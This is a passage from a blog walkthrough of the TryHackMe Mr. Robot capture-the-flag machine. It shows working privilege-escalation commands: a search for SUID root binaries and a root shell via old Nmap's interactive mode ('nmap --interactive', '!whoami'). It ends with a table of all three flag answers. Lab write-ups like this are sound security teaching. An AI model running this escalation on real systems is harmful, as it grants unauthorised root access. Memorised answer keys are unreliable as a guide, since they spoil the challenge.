beginning; we can see that the SSH port is closed. The final key is mostly located in the /root directory. To get root, we need to do a privilege escalation. The first thing that interests me is whether the user robot is in the so-called sudo group.\nPrivilege escalation # Is user robot in the sudo group ?\n$ sudo -l sudo -l [sudo] password for robot: abcdefghijklmnopqrstuvwxyz Sorry, user robot may not run sudo on linux. The user robot is not on the list with sudo privileges. Now we can see which programs are under the root user.\nChecking SETUID that are under root control: # Command:\nfind / -user root -perm -4000 -print 2\u0026gt;/dev/null Output:\n$ find / -user root -perm -4000 -print 2\u0026gt;/dev/null / -user root -perm -4000 -print 2\u0026gt;/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown I immediately noticed /usr/local/bin/nmap. Let\u0026rsquo;s see what version of Nmap it is.\nChecking Nmap version: # Command:\nnmap --version Output:\n$ nmap --version nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ ) As we can see, the Nmap version is 3.81.\nEnumeration: # After a bit of research, I found out:\nLINK as we can read at the link above, this is an older Nmap version. Versions from 2.02 to 5.21 had the so-called. The interactive mode allowed us to execute commands. In addition, checking SETUID will enable us to run commands as root.\n$ ls -l /usr/local/bin/nmap ls -l /usr/local/bin/nmap -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap Starting Nmap in the interactive mode: # Command:\nnmap --interactive Output:\n$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !whoami !whoami root waiting to reap child : No child processes We see that Nmap is in interactive root mode.\nFinding the final key: # We will first check if the third flag is in the root.\nCommand:\n!ls /root Output:\nnmap\u0026gt; !ls /root !ls /root firstboot_done key-3-of-3.txt waiting to reap child : No child processes We found the third key that is in the text file. We can read the content with the following command:\n!cat /root/key-3-of-3.txt nmap\u0026gt; !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes Third key: 04787ddef27c3dee1ee161b21670b4e4\nConclusion # Interesting CTF with a lot of references to the series. I\u0026rsquo;ve learned a lot, and the most important thing is to regularly update operating systems and applications, as we see in the example with the older version of Nmap and WordPress. Also, do not allow anyone to hack your accounts, change the codes regularly and use random codes with a minimum length of 32 digits for each account. Everyone should follow one password, one account, and one email address.\nKeys # List of questions and answers:\nQuestions Answers What is key 1 ? 073403c8a58a1f80d943455fb30724b9 What is key 2 ? 822c73956184f694993bede3eb39f959 What is key 3 ? 04787ddef27c3dee1ee161b21670b4e4 Thank you for your time 💙 # ","date":"23 May 2021","permalink":"/blog/mr-robot-ctf/","section":"Blogs","summary":"🤖 TryHackMe Mr. Robot CTF 🤖 Can we hack Mr. Robot CTF? This virtual machine is rated medium and will teach us many useful things.\nThe instructions will help achieve the same answers; there are step-by-step instructions.","title":"Mr. Robot CTF"},{"content":"","date":"1 January 0001","permalink":"/tags/","section":"Tags","summary":"","title":"Tags"}]